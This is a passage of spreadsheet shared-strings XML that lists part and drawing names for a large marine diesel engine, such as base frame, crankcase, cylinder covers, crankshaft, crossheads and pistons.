  </si>
  <si>
    <t>WELD. PROC. OF BASE FRAME</t>
  </si>
  <si>
    <t>MOUNTING INSTRUCTION</t>
  </si>
  <si>
    <t>FLAT STEEL BARS</t>
  </si>
  <si>
    <t>TEMPLATE MACHINED</t>
  </si>
  <si>
    <t>TEMPLATE WELD</t>
  </si>
  <si>
    <t>PLACING O.TEMPL.ON FOUND.</t>
  </si>
  <si>
    <t>ROUNDSTEEL</t>
  </si>
  <si>
    <t>PLATE FOR SHIELD</t>
  </si>
  <si>
    <t>I-PROFILE</t>
  </si>
  <si>
    <t>FOUNDATION FRAME MACH.</t>
  </si>
  <si>
    <t>DIAGRAM FOR OIL PAN</t>
  </si>
  <si>
    <t>DRIP PLATE</t>
  </si>
  <si>
    <t>STEEL SHOCK</t>
  </si>
  <si>
    <t>ELASTIC MOUNTING</t>
  </si>
  <si>
    <t>FOUNDATION FRAME</t>
  </si>
  <si>
    <t>PIPE FOR NIVEAU ALARM</t>
  </si>
  <si>
    <t>BASE FRAME COMPLETE</t>
  </si>
  <si>
    <t>BRACKET FOR PLATE COOLER</t>
  </si>
  <si>
    <t>WEDGE</t>
  </si>
  <si>
    <t>LOCKING PIECE</t>
  </si>
  <si>
    <t>AXLE JOURNAL</t>
  </si>
  <si>
    <t>SECTION IN BEDPLATE WELD.</t>
  </si>
  <si>
    <t>BASE FRAME WELDED</t>
  </si>
  <si>
    <t>RECTANGUL. HOLLOW SECTION</t>
  </si>
  <si>
    <t>RIB UNDER ENGINE</t>
  </si>
  <si>
    <t>LUB. OIL SUCTION PIPE</t>
  </si>
  <si>
    <t>1.ARCH RIB UNDER FLYWHEEL</t>
  </si>
  <si>
    <t>2.ARCH RIB UNDER FLYWHEEL</t>
  </si>
  <si>
    <t>HOLDER FOR DIPSTICK</t>
  </si>
  <si>
    <t>SEC. IN BASE FRAME MACH.</t>
  </si>
  <si>
    <t>SUCTION PIPE F. SEPERATOR</t>
  </si>
  <si>
    <t>PLATE UNDER GENERATOR</t>
  </si>
  <si>
    <t>PROTECTING CAP</t>
  </si>
  <si>
    <t>OIL PAN MACHINED</t>
  </si>
  <si>
    <t>BOTTOM PLATE UNDER ENGINE</t>
  </si>
  <si>
    <t>ARCH RIB U.AFT. SHIELD</t>
  </si>
  <si>
    <t>HEX.SOC.LOW HEAD CAP SCRE</t>
  </si>
  <si>
    <t>WASHER</t>
  </si>
  <si>
    <t>PLATE FOR IMO</t>
  </si>
  <si>
    <t>SPRING UNIT</t>
  </si>
  <si>
    <t>PERFORATET PLATE</t>
  </si>
  <si>
    <t>SOCKET 1 1/4 SRG</t>
  </si>
  <si>
    <t>PLATE FOR AFTER SHIELD</t>
  </si>
  <si>
    <t>CONICAL ANTI-VIBR. MOUNT.</t>
  </si>
  <si>
    <t>FOUNDATION RAIL</t>
  </si>
  <si>
    <t>HANDLE FOR DIPSTICK</t>
  </si>
  <si>
    <t>HOLDING DOWN BOLT</t>
  </si>
  <si>
    <t>FRAME SECTION FORE</t>
  </si>
  <si>
    <t>A-FRAME</t>
  </si>
  <si>
    <t>END FRAME FORE</t>
  </si>
  <si>
    <t>END FRAME AFT</t>
  </si>
  <si>
    <t>INTERM.FRAME-FORE</t>
  </si>
  <si>
    <t>INTERM.FRAME-AFT</t>
  </si>
  <si>
    <t>REARSIDE-DRILLING</t>
  </si>
  <si>
    <t>FRAME DETAILS</t>
  </si>
  <si>
    <t>TOP COVER</t>
  </si>
  <si>
    <t>CUTTING PLAN FRAME BOX</t>
  </si>
  <si>
    <t>STAY BOLT TUBE</t>
  </si>
  <si>
    <t>CROSSHEAD GUIDE</t>
  </si>
  <si>
    <t>SUPPORT FLANGE</t>
  </si>
  <si>
    <t>GUIDE STRIP</t>
  </si>
  <si>
    <t>WEARING RING</t>
  </si>
  <si>
    <t>HINGE ROD</t>
  </si>
  <si>
    <t>FRAME GIRDER</t>
  </si>
  <si>
    <t>FRAME BOX-FORE</t>
  </si>
  <si>
    <t>FRAME BOX-AFT</t>
  </si>
  <si>
    <t>FRAME BOX</t>
  </si>
  <si>
    <t>DOOR FRAME</t>
  </si>
  <si>
    <t>OIL COLLECTOR</t>
  </si>
  <si>
    <t>DOOR FRAME DETAIL</t>
  </si>
  <si>
    <t>EXTRACTOR PLATE</t>
  </si>
  <si>
    <t>PLATE F. TRIANGULAR TUBE</t>
  </si>
  <si>
    <t>BACKING PIECE</t>
  </si>
  <si>
    <t>TOP PLATE</t>
  </si>
  <si>
    <t>STAY BOLT-UPPER PART</t>
  </si>
  <si>
    <t>STAY BOLT-LOWER PART</t>
  </si>
  <si>
    <t>STAY BOLT</t>
  </si>
  <si>
    <t>STAY BOLT NUT</t>
  </si>
  <si>
    <t>SPARE NUT</t>
  </si>
  <si>
    <t>ASSEMBLY NUT</t>
  </si>
  <si>
    <t>SUPPORT PIECE</t>
  </si>
  <si>
    <t>PROTECTIVE CAP</t>
  </si>
  <si>
    <t>STAY BOLT DETAILS</t>
  </si>
  <si>
    <t>GUIDE BUSHING</t>
  </si>
  <si>
    <t>BRACING STUD</t>
  </si>
  <si>
    <t>HOUSING FOR BRACING STUD</t>
  </si>
  <si>
    <t>SCAVENGE BOX-FORE</t>
  </si>
  <si>
    <t>SCAVENGE BOX-MIDDLE</t>
  </si>
  <si>
    <t>SCAVENGE BOX-AFT</t>
  </si>
  <si>
    <t>SCAVEN.BOX-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>END SHIELD</t>
  </si>
  <si>
    <t>FUNNEL-PISTON COOLING OIL</t>
  </si>
  <si>
    <t>PROTECTIVE GUARD</t>
  </si>
  <si>
    <t>PROTECTIVE TUBE</t>
  </si>
  <si>
    <t>DRAIN PIPE-PISTON COOLING</t>
  </si>
  <si>
    <t>SEALING RING</t>
  </si>
  <si>
    <t>SCAVENGE BOX, DETAILS</t>
  </si>
  <si>
    <t>ER DER TEGNINGER</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL-UPPER</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL-LOWER</t>
  </si>
  <si>
    <t>KEY FOR MAIN BEARING CAP</t>
  </si>
  <si>
    <t>SHIELD-UPPER PART</t>
  </si>
  <si>
    <t>SHIELD-LOWER PART</t>
  </si>
  <si>
    <t>NUT FOR MAIN BEARING STUD</t>
  </si>
  <si>
    <t>EXTENSION SOCKET</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL-COMPL.</t>
  </si>
  <si>
    <t>THRUST WASHER</t>
  </si>
  <si>
    <t>FRAME TOP VIEW</t>
  </si>
  <si>
    <t>ADJUSTABLE SPACER</t>
  </si>
  <si>
    <t>GUARD FORE END</t>
  </si>
  <si>
    <t>GUARD</t>
  </si>
  <si>
    <t>DETAIL FOR THRUST WASHER</t>
  </si>
  <si>
    <t>COVER ON EXHAUST SIDE</t>
  </si>
  <si>
    <t>MOUNTING OF THERMOSENSORS</t>
  </si>
  <si>
    <t>PIPE F.THERMOSENSOR CABLE</t>
  </si>
  <si>
    <t>UNION</t>
  </si>
  <si>
    <t>PLUG SCREW</t>
  </si>
  <si>
    <t>WEAR RING</t>
  </si>
  <si>
    <t>MAIN BEARING,TIN-ALU</t>
  </si>
  <si>
    <t>MAIN BEARING,LEAD-BRONZE</t>
  </si>
  <si>
    <t>SECURING PIECE</t>
  </si>
  <si>
    <t>FRAME BOTTOM &amp; REAR SIDE</t>
  </si>
  <si>
    <t>GUIDE BEARING CAP</t>
  </si>
  <si>
    <t>COVER FOR FLYWHEEL END</t>
  </si>
  <si>
    <t>COVER-AIR CHAMBER</t>
  </si>
  <si>
    <t>COOLING WATER NIPPLE</t>
  </si>
  <si>
    <t>DETAIL FOR PROTECTIVE CAP</t>
  </si>
  <si>
    <t>MUD COLLECTOR</t>
  </si>
  <si>
    <t>GUIDE SHELL/MAIN BEARING</t>
  </si>
  <si>
    <t>GUIDE TUBE</t>
  </si>
  <si>
    <t>GUIDEPLATE F.MILLING UNIT</t>
  </si>
  <si>
    <t>GUIDEBOLT F.MILLING UNIT</t>
  </si>
  <si>
    <t>GUIDE FOR MILLING BRACKET</t>
  </si>
  <si>
    <t>NAMEPLATE TIGHT STAYBOLT</t>
  </si>
  <si>
    <t>CYLINDER CRANKCASE</t>
  </si>
  <si>
    <t>UNMACH CYLINDER CRANKCASE</t>
  </si>
  <si>
    <t>FRAME &amp; CRANKCASE COMPL.</t>
  </si>
  <si>
    <t>MOUNT.OF MAIN BEARING CAP</t>
  </si>
  <si>
    <t>SKETCH FOR MEASUREMENTS</t>
  </si>
  <si>
    <t>REPAIR SOLUTION</t>
  </si>
  <si>
    <t>LIST OF MAIN BEARINGS</t>
  </si>
  <si>
    <t>NUT F.WATER ALARM CYL.LIN</t>
  </si>
  <si>
    <t>PIPE F.WATERALARM CYL.LIN</t>
  </si>
  <si>
    <t>BRACING BOLT</t>
  </si>
  <si>
    <t>SAFETY SLEEVE</t>
  </si>
  <si>
    <t>COOLING WATER CONNECTION</t>
  </si>
  <si>
    <t>FRAME MOUNTING</t>
  </si>
  <si>
    <t>FRAME TOP</t>
  </si>
  <si>
    <t>FRAME BOTTOM</t>
  </si>
  <si>
    <t>FRAME SIDE</t>
  </si>
  <si>
    <t>FRAME REAR SIDE</t>
  </si>
  <si>
    <t>FRAME SECTION</t>
  </si>
  <si>
    <t>FRAME COUNTER COUPL.SIDE</t>
  </si>
  <si>
    <t>FRAME COUPLING SIDE</t>
  </si>
  <si>
    <t>RING FOR THRUST WASHER</t>
  </si>
  <si>
    <t>SHIELDCOUPL. SIDE UPPER</t>
  </si>
  <si>
    <t>GLUE FOR SECURITY OF STUD</t>
  </si>
  <si>
    <t>SEALING FOR CAP</t>
  </si>
  <si>
    <t>BUSH FOR MAIN BEARING</t>
  </si>
  <si>
    <t>GUIDE BEARING</t>
  </si>
  <si>
    <t>BUSH FOR GUIDE BEARING</t>
  </si>
  <si>
    <t>SHIELD COUPL. SIDE LOWER</t>
  </si>
  <si>
    <t>PENN LOCKING RING</t>
  </si>
  <si>
    <t>CHAINWHEEL FRAME-UPPER</t>
  </si>
  <si>
    <t>CHAINWHEEL FRAME-LOWER</t>
  </si>
  <si>
    <t>COOLING JACKET-INTERMEDI.</t>
  </si>
  <si>
    <t>SCAVENGE BOX-INTERMEDIATE</t>
  </si>
  <si>
    <t>BEARING CAP-CAMSHAFT</t>
  </si>
  <si>
    <t>GUARD-UPPER PART-FRONT</t>
  </si>
  <si>
    <t>GUARD-LOWER PART-FRONT</t>
  </si>
  <si>
    <t>GUARD-UPPER PART-REAR</t>
  </si>
  <si>
    <t>GUARD-LOWER PART-REAR</t>
  </si>
  <si>
    <t>TOP STRIP</t>
  </si>
  <si>
    <t>GUARD-INTERMEDIATE FRAME</t>
  </si>
  <si>
    <t>INSPECTION COVER</t>
  </si>
  <si>
    <t>SCRAPER RING COVER</t>
  </si>
  <si>
    <t>SUPPORTING RING</t>
  </si>
  <si>
    <t>TOP GUARD</t>
  </si>
  <si>
    <t>GUARD, CAMSHAFT</t>
  </si>
  <si>
    <t>HOUSING-OIL SEPARATOR</t>
  </si>
  <si>
    <t>CAUTION PLATE</t>
  </si>
  <si>
    <t>FRAME GUARDS</t>
  </si>
  <si>
    <t>NAMEPLATE, MAIN BEARING</t>
  </si>
  <si>
    <t>SCRAPER RING-UPPER</t>
  </si>
  <si>
    <t>SCRAPER RING-LOWER</t>
  </si>
  <si>
    <t>OIL SEAL COVER-UPPER</t>
  </si>
  <si>
    <t>OIL SEAL COVER-LOWER</t>
  </si>
  <si>
    <t>OIL THROW RING-RUBBER</t>
  </si>
  <si>
    <t>FRAME BOX DOOR</t>
  </si>
  <si>
    <t>FRAME DOOR-FRONT</t>
  </si>
  <si>
    <t>FRAME DOOR-REAR</t>
  </si>
  <si>
    <t>SHIELD, FORE</t>
  </si>
  <si>
    <t>SHIELD, AFT</t>
  </si>
  <si>
    <t>SHIELD, UPPER</t>
  </si>
  <si>
    <t>SHIELD, LOWER</t>
  </si>
  <si>
    <t>GASKET FOR SHIELD</t>
  </si>
  <si>
    <t>SHIELD UPPER, MACHINING</t>
  </si>
  <si>
    <t>SHIELD LOWER, MACHINING</t>
  </si>
  <si>
    <t>WELDING DETAILS-GUARD</t>
  </si>
  <si>
    <t>GUARD-LOWER PART</t>
  </si>
  <si>
    <t>RELIEF VALVE COVER</t>
  </si>
  <si>
    <t>CAMSHAFT COVER</t>
  </si>
  <si>
    <t>COVER F. GEARWHEEL DRIVE</t>
  </si>
  <si>
    <t>SYNTHETIC RUBBER HOSE</t>
  </si>
  <si>
    <t>CLEANING COVER</t>
  </si>
  <si>
    <t>GUARD, FORE END</t>
  </si>
  <si>
    <t>COVER UPPER</t>
  </si>
  <si>
    <t>COVER LOWER</t>
  </si>
  <si>
    <t>COVER F. CH. AIR RECEIVER</t>
  </si>
  <si>
    <t>GUARD END AFTER</t>
  </si>
  <si>
    <t>COVER FOR CRANKCASE</t>
  </si>
  <si>
    <t>GUARD UPPER PART</t>
  </si>
  <si>
    <t>GUARD LOWER PART</t>
  </si>
  <si>
    <t>COVER F. CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>COVER AIR CHAMBER</t>
  </si>
  <si>
    <t>MOUNT. OF SEALING RING</t>
  </si>
  <si>
    <t>GUARD INTERMEDIATE</t>
  </si>
  <si>
    <t>COVER ON REAR SIDE</t>
  </si>
  <si>
    <t>COVER F. GEAR WHEEL DRIVE</t>
  </si>
  <si>
    <t>NOISE AND TEMP. REDUCTION ARR.</t>
  </si>
  <si>
    <t>NOISE AND TEMP. REDUCTION COVER</t>
  </si>
  <si>
    <t>COVER F.CRANKSHAFT HOUS.</t>
  </si>
  <si>
    <t>MOUNTING PIECE</t>
  </si>
  <si>
    <t>CYL.LINER-INTERMED.PART</t>
  </si>
  <si>
    <t>SKIRT-CYLINDER LINER</t>
  </si>
  <si>
    <t>CYLINDER LINER-UPPER PART</t>
  </si>
  <si>
    <t>CYLINDER LINER-LOWER PART</t>
  </si>
  <si>
    <t>PISTON CLEANING RING</t>
  </si>
  <si>
    <t>EXHAUST BELT Y56F</t>
  </si>
  <si>
    <t>BUSHING</t>
  </si>
  <si>
    <t>FLAME RING</t>
  </si>
  <si>
    <t>STOP BLOCK</t>
  </si>
  <si>
    <t>SHIELD</t>
  </si>
  <si>
    <t>THREADED PLUG</t>
  </si>
  <si>
    <t>CYLINDER FRAME COMPLETE</t>
  </si>
  <si>
    <t>CYLINDER FRAME-SEALING</t>
  </si>
  <si>
    <t>RAIL FOR SEALING</t>
  </si>
  <si>
    <t>CYLINDER FRAME</t>
  </si>
  <si>
    <t>COOLING JACKET-UPPER PART</t>
  </si>
  <si>
    <t>COOLING JACKET</t>
  </si>
  <si>
    <t>COOLING JACKET+CYL.LINER</t>
  </si>
  <si>
    <t>STUFFING BOX</t>
  </si>
  <si>
    <t>HOLDER FOR COOLING JACKET</t>
  </si>
  <si>
    <t>STUD, CYL.COVER</t>
  </si>
  <si>
    <t>REP.CYL.FRAME/COOL JACKET</t>
  </si>
  <si>
    <t>HOUSING, NON-RETURN VALVE</t>
  </si>
  <si>
    <t>HEAD, NON-RETURN VALVE</t>
  </si>
  <si>
    <t>COLLAR</t>
  </si>
  <si>
    <t>PIPE FOR CYLINDER LINER</t>
  </si>
  <si>
    <t>REPAIR, CYLINDER FRAME</t>
  </si>
  <si>
    <t>LIFT TOOL FOR CYL.LINER</t>
  </si>
  <si>
    <t>HONING TOOL</t>
  </si>
  <si>
    <t>COLLAR-HALF FOR CYL.LINER</t>
  </si>
  <si>
    <t>GRINDING RING</t>
  </si>
  <si>
    <t>DRILL.TOOL, THREADS,LINER</t>
  </si>
  <si>
    <t>LIFTING &amp; TILTING SCREW</t>
  </si>
  <si>
    <t>EXTRACTOR FOR GUIDE PIN</t>
  </si>
  <si>
    <t>COVER F. STUFF.BOX HOLE</t>
  </si>
  <si>
    <t>MEAS.POINTS,CYL.LIN.TEMP.</t>
  </si>
  <si>
    <t>STEP RING</t>
  </si>
  <si>
    <t>DISM.HEIGHT F.CYL. LINER</t>
  </si>
  <si>
    <t>CYLINDER LINER COMPL.</t>
  </si>
  <si>
    <t>CYLINDER RING-Y56</t>
  </si>
  <si>
    <t>CYL.COVER-BOTTOM PART</t>
  </si>
  <si>
    <t>SEALING RING-CYL.COVER</t>
  </si>
  <si>
    <t>HEAT SHIELD</t>
  </si>
  <si>
    <t>COOLING SHIELD-UPPER</t>
  </si>
  <si>
    <t>COOLING SHIELD-LOWER</t>
  </si>
  <si>
    <t>PIPE FOR FUEL VALVE</t>
  </si>
  <si>
    <t>COVER FOR GUARD</t>
  </si>
  <si>
    <t>GUARD FOR FUEL VALVE</t>
  </si>
  <si>
    <t>FRAME FOR CYL.COVER</t>
  </si>
  <si>
    <t>GUARD FOR CYL.COVER</t>
  </si>
  <si>
    <t>SCREW, SUPPORTING</t>
  </si>
  <si>
    <t>STUD, EXHAUST VALVE</t>
  </si>
  <si>
    <t>SLEEVE-FUEL OIL VALVE</t>
  </si>
  <si>
    <t>SLEEVE, FUEL VALVE</t>
  </si>
  <si>
    <t>PROTECTIVE BUSHING</t>
  </si>
  <si>
    <t>SLEEVE WITH O-RING</t>
  </si>
  <si>
    <t>RETAINING RING</t>
  </si>
  <si>
    <t>SPRING HOUSING,FUEL VALVE</t>
  </si>
  <si>
    <t>STUD, FUEL VALVE</t>
  </si>
  <si>
    <t>STUD, FUEL GAS VALVE</t>
  </si>
  <si>
    <t>FLANGE, FUEL VALVE</t>
  </si>
  <si>
    <t>SLEEVE, STARTING VALVE</t>
  </si>
  <si>
    <t>SLEEVE-SAFETY VALVE</t>
  </si>
  <si>
    <t>SPRING HOUSING, ST. VALVE</t>
  </si>
  <si>
    <t>STUD, ST. VALVE</t>
  </si>
  <si>
    <t>SCREW-STARTING VALVE</t>
  </si>
  <si>
    <t>SLEEVE, SAFETY VALVE</t>
  </si>
  <si>
    <t>SLEEVE COMPLETE</t>
  </si>
  <si>
    <t>SPRING HOUSING, SAFETY V.</t>
  </si>
  <si>
    <t>SLEEVE, INDICATOR VALVE</t>
  </si>
  <si>
    <t>SPRING HOUSING, INDICATOR</t>
  </si>
  <si>
    <t>PIPE IN AIR DUCT</t>
  </si>
  <si>
    <t>INLET VALVE SEAT</t>
  </si>
  <si>
    <t>CENTRAL BOLT</t>
  </si>
  <si>
    <t>NUT FOR CENTRAL BOLT</t>
  </si>
  <si>
    <t>VALVE SEAT RING-EXHAUST</t>
  </si>
  <si>
    <t>STUD, BRACKET</t>
  </si>
  <si>
    <t>CYL.COV.UP.PART-TOP VIEW</t>
  </si>
  <si>
    <t>CYLINDRICAL PIN</t>
  </si>
  <si>
    <t>CYLINDER COVER LOWER PART</t>
  </si>
  <si>
    <t>CYLINDER COVER STUD</t>
  </si>
  <si>
    <t>STUD, STARTING VALVE</t>
  </si>
  <si>
    <t>STUD, INJECTOR</t>
  </si>
  <si>
    <t>CYL.COVER TOP VIEW</t>
  </si>
  <si>
    <t>CYL. COVER TOP, REAR SIDE</t>
  </si>
  <si>
    <t>GAS VALVE DUMMY</t>
  </si>
  <si>
    <t>GRIND.DISC-FUEL VALV.SEAT</t>
  </si>
  <si>
    <t>GRIND.DISC-ST.VALVE SEAT</t>
  </si>
  <si>
    <t>SPINDLE F.MOUNT.TOOL</t>
  </si>
  <si>
    <t>DISMOUNT.DRIFT-VALVE SEAT</t>
  </si>
  <si>
    <t>MOUNTING DRIFT-VALVE SEAT</t>
  </si>
  <si>
    <t>LIFTING TOOLS</t>
  </si>
  <si>
    <t>HYDR.TIGHTENING TOOLS</t>
  </si>
  <si>
    <t>GAUGE</t>
  </si>
  <si>
    <t>TIGHT.GAUGE-CYL.COVER NUT</t>
  </si>
  <si>
    <t>IMPACT WRENCH,HYDR. RING</t>
  </si>
  <si>
    <t>GRIND.WHEEL-EXH.VAL.SEAT</t>
  </si>
  <si>
    <t>EXT.STUD, LIFT CYL.COVER</t>
  </si>
  <si>
    <t>HYDR.TIGHTENING RING</t>
  </si>
  <si>
    <t>CYLINDER COVER COMPLETE</t>
  </si>
  <si>
    <t>MOUNT. OF THROTTLE VALVE</t>
  </si>
  <si>
    <t>M. OF VALVE SEAT RINGS</t>
  </si>
  <si>
    <t>REPAIR SOLUTION,CYL.COVER</t>
  </si>
  <si>
    <t>REPARING PARTS</t>
  </si>
  <si>
    <t>GUARD FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>SLEEVE FUEL OIL VALVE</t>
  </si>
  <si>
    <t>THRUST COLLAR</t>
  </si>
  <si>
    <t>PACKING RING</t>
  </si>
  <si>
    <t>VALVE SEAT RING</t>
  </si>
  <si>
    <t>NUT FOR CYL. COVER STUDS</t>
  </si>
  <si>
    <t>REMACHINING OF CYL. COVER</t>
  </si>
  <si>
    <t>CYL. COVER, BOTTOM VIEW</t>
  </si>
  <si>
    <t>CYLINDER COVER, SIDE VIEW</t>
  </si>
  <si>
    <t>CYLINDER COVER, TOP VIEW</t>
  </si>
  <si>
    <t>FRAME F. CYL. HEAD COVER</t>
  </si>
  <si>
    <t>VALVE SEAT RING, EXHAUST</t>
  </si>
  <si>
    <t>VALVE SEAT RING INLET</t>
  </si>
  <si>
    <t>CYL. COVER, FRONT VIEW</t>
  </si>
  <si>
    <t>FORE END</t>
  </si>
  <si>
    <t>CRANKSHAFT+TURNING WHEEL</t>
  </si>
  <si>
    <t>CRANK ARM</t>
  </si>
  <si>
    <t>CRANK WEB</t>
  </si>
  <si>
    <t>SHAFT PIECE W. THRUST CAM</t>
  </si>
  <si>
    <t>COUNTERWEIGHT</t>
  </si>
  <si>
    <t>AXIAL VIBRATION DETUNER</t>
  </si>
  <si>
    <t>PRESSURE VALVE</t>
  </si>
  <si>
    <t>OVERFLOW VALVE</t>
  </si>
  <si>
    <t>STOP SCREW</t>
  </si>
  <si>
    <t>OIL THROW RING</t>
  </si>
  <si>
    <t>COUPLING FLANGE</t>
  </si>
  <si>
    <t>SEE SUPPLEMENTARY LIST</t>
  </si>
  <si>
    <t>GUIDE - MAIN BEARING CAP</t>
  </si>
  <si>
    <t>ALIGNMENT TOOLS</t>
  </si>
  <si>
    <t>PIN GAUGE FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>HOF FITTED BOLT SLEEVE</t>
  </si>
  <si>
    <t>HOF FITTED BOLT SHANK</t>
  </si>
  <si>
    <t>HOF FITTED BOLT HYDR.JACK</t>
  </si>
  <si>
    <t>HYDRAULIC TOOLS</t>
  </si>
  <si>
    <t>FITTED STUD</t>
  </si>
  <si>
    <t>HEXAGON FITTED BOLT</t>
  </si>
  <si>
    <t>HUB FOR GEAR WHEEL</t>
  </si>
  <si>
    <t>GEARWHEEL FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>STOPSCREW</t>
  </si>
  <si>
    <t>TUNING WHEEL</t>
  </si>
  <si>
    <t>SCREW FOR COUNTER WEIGHT</t>
  </si>
  <si>
    <t>LOCKING NUT</t>
  </si>
  <si>
    <t>BLANK FOR COUNTERWEIGHT</t>
  </si>
  <si>
    <t>CRANKSHAFT ROUGH MACHINED</t>
  </si>
  <si>
    <t>CRANKSHAFT DETAILS</t>
  </si>
  <si>
    <t>VIBRATION DAMPER</t>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECTION</t>
  </si>
  <si>
    <t>MOUNT. CR.SHAFT/FLYWHEEL</t>
  </si>
  <si>
    <t>CRANKSHAFT BLANK</t>
  </si>
  <si>
    <t>CRANKSHAFT SOLID FORGED</t>
  </si>
  <si>
    <t>STUD SCREW</t>
  </si>
  <si>
    <t>SCREW-SPECIAL</t>
  </si>
  <si>
    <t>CONNECTING ROD - REPAIR</t>
  </si>
  <si>
    <t>CRANKPIN BEARING</t>
  </si>
  <si>
    <t>CRANK BEARING-UPPER PART</t>
  </si>
  <si>
    <t>CRANK BEARING-LOWER PART</t>
  </si>
  <si>
    <t>CONNECTING ROD BOLT</t>
  </si>
  <si>
    <t>BEARING SHELL-CRANKPIN</t>
  </si>
  <si>
    <t>BEARING HOUSING-CRANKPIN</t>
  </si>
  <si>
    <t>CAP, CRANKPIN BEARING</t>
  </si>
  <si>
    <t>CROSSHEAD BEARING</t>
  </si>
  <si>
    <t>CROSSHEAD BEAR.UPPER PART</t>
  </si>
  <si>
    <t>CROSSHEAD BEAR.LOWER PART</t>
  </si>
  <si>
    <t>CROSSHEAD BOLT</t>
  </si>
  <si>
    <t>LINER FOR GUDGEON PIN</t>
  </si>
  <si>
    <t>BEARING SHELL-CROSSHEAD</t>
  </si>
  <si>
    <t>BEARING HOUSING-CROSSHEAD</t>
  </si>
  <si>
    <t>STUD, BEARING HOUSING</t>
  </si>
  <si>
    <t>THRUST RING W.WHITE METAL</t>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL-UPPER</t>
  </si>
  <si>
    <t>CONNECTING ROD STUD</t>
  </si>
  <si>
    <t>NUT FOR CONN.ROD STUD</t>
  </si>
  <si>
    <t>BEARING SHELL</t>
  </si>
  <si>
    <t>CONN.ROD BEARING-COMPLETE</t>
  </si>
  <si>
    <t>CONNECTING ROD BUSH</t>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL-LOWER</t>
  </si>
  <si>
    <t>CRANKPIN BEARING CAP</t>
  </si>
  <si>
    <t>CONN.ROD, BORING F.SHELLS</t>
  </si>
  <si>
    <t>CROSSHEAD BEARING CAP</t>
  </si>
  <si>
    <t>DUMMY CROSSHEAD BEAR.CAP</t>
  </si>
  <si>
    <t>COLLAR-HALF</t>
  </si>
  <si>
    <t>OIL BLOCKING TOOL, X-HEAD</t>
  </si>
  <si>
    <t>MOUNT.TOOL,STUFF.B.SPRING</t>
  </si>
  <si>
    <t>EXT.STUD, LIFT X-HEAD CAP</t>
  </si>
  <si>
    <t>GUIDE SHOE EXTRACTOR</t>
  </si>
  <si>
    <t>SLIDING SHOE(TOOL)</t>
  </si>
  <si>
    <t>SUPPORT FOR WRENCH</t>
  </si>
  <si>
    <t>LIFT. ATTACHMENT-CONN.ROD</t>
  </si>
  <si>
    <t>RETAINING TOOL,CRANK BRG.</t>
  </si>
  <si>
    <t>COVER,SLOT IN X-HEAD CAP</t>
  </si>
  <si>
    <t>DISMTL.SCREW-CROSSH. END</t>
  </si>
  <si>
    <t>LIFT. TOOL, X-HEAD SHELL</t>
  </si>
  <si>
    <t>RUBBER COVER F. CROSSHEAD</t>
  </si>
  <si>
    <t>WHITEMETAL IN CNK.PIN BRG</t>
  </si>
  <si>
    <t>CONNECTING ROD COMPLETE</t>
  </si>
  <si>
    <t>SCREW FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>CONNECTING ROD (BLANK)</t>
  </si>
  <si>
    <t>SHIMS</t>
  </si>
  <si>
    <t>PLATE FOR NUT</t>
  </si>
  <si>
    <t>CONNECTING ROD BEARING</t>
  </si>
  <si>
    <t>BUSH FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>CRANK BEARING,ROUGH MACH.</t>
  </si>
  <si>
    <t>CRANK BEARING - BLANK</t>
  </si>
  <si>
    <t>STUD, PISTON ROD</t>
  </si>
  <si>
    <t>SCREW FOR PISTON ROD</t>
  </si>
  <si>
    <t>SHIM UNDER PISTON ROD</t>
  </si>
  <si>
    <t>SECURING FLANGE</t>
  </si>
  <si>
    <t>STUFFING BOX, PISTON ROD</t>
  </si>
  <si>
    <t>HOUSING-STUFFING BOX</t>
  </si>
  <si>
    <t>BASE RING-SCRAPER RING</t>
  </si>
  <si>
    <t>LAMELLA</t>
  </si>
  <si>
    <t>HOLDER-SCRAPER RING</t>
  </si>
  <si>
    <t>TOP COVER 2/2</t>
  </si>
  <si>
    <t>BASE RING-SEALING RING</t>
  </si>
  <si>
    <t>SEGMENT-SEALING RING</t>
  </si>
  <si>
    <t>GUIDE SHOE JOURNAL</t>
  </si>
  <si>
    <t>CROSSHEAD</t>
  </si>
  <si>
    <t>OILFLOW REGULATING PLUG</t>
  </si>
  <si>
    <t>GUIDE RING FOR PISTON ROD</t>
  </si>
  <si>
    <t>NAMEPLATE FOR CROSSHEAD</t>
  </si>
  <si>
    <t>SHIM FOR GUIDE STRIP</t>
  </si>
  <si>
    <t>GAUGE STUFFING BOX</t>
  </si>
  <si>
    <t>GUIDE PIPE, PISTON ROD</t>
  </si>
  <si>
    <t>LIFT. TOOL, STUFFING BOX</t>
  </si>
  <si>
    <t>WORKTABLE-STUFFING BOX</t>
  </si>
  <si>
    <t>WORKTABLE CLAMP</t>
  </si>
  <si>
    <t>PIN WRENCH</t>
  </si>
  <si>
    <t>DISTANCE PIECE-STUF.BOX</t>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,CROSSH.END</t>
  </si>
  <si>
    <t>BRACKET-SUPPORT OF X-HEAD</t>
  </si>
  <si>
    <t>FRAME COUNTER COUPL. SIDE</t>
  </si>
  <si>
    <t>PISTON CROWN</t>
  </si>
  <si>
    <t>TOP PISTON</t>
  </si>
  <si>
    <t>PISTON PIN</t>
  </si>
  <si>
    <t>PISTON ROD STUFFING BOX</t>
  </si>
  <si>
    <t>PISTON CROWN AND SKIRT</t>
  </si>
  <si>
    <t>SLIDE RING</t>
  </si>
  <si>
    <t>PISTON STUD</t>
  </si>
  <si>
    <t>PIPE FOR COOLING INSERT</t>
  </si>
  <si>
    <t>COOLING OIL NOZZLE</t>
  </si>
  <si>
    <t>CYLINDER F.COOLING INSERT</t>
  </si>
  <si>
    <t>CONICAL RING</t>
  </si>
  <si>
    <t>BLANK PISTON CROWN UPPER</t>
  </si>
  <si>
    <t>BLANK PISTON CROWN LOWER</t>
  </si>
  <si>
    <t>OIL DISTRIBUTOR RING</t>
  </si>
  <si>
    <t>OIL SCRAPER RING</t>
  </si>
  <si>
    <t>SPECIAL SHIM</t>
  </si>
